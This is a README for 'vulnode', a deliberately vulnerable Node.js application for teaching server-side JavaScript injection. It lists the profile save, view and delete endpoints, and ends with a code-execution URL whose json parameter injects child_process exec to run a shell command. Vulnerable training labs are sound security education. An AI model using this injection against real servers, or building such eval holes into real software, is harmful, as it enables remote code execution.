/vulnode

a vulnerable node.js application for education purpose

Primary LanguageJavaScriptMIT LicenseMIT

vulnode

Vulnode is a Node.js application vulnerable to server-side javascript injection. This is for education purposes only.

  • Save a profile: http://localhost:9091/?action=save&name=nishant&json={"name":"Nishant","age":"25","gender":"Male","location":"Bangalore","interests":"Piano"}

  • View a profile: http://localhost:9091/?action=view&name=nishant

  • Delete a profile: http://localhost:9091/?action=delete&name=nishant

  • Code Execution: http://localhost:9091/?json='test');var sys=require('sys');var exec=require('child_process').exec;function puts(error,stdout,stderr){sys.puts(stdout)};exec("ls -lah",puts);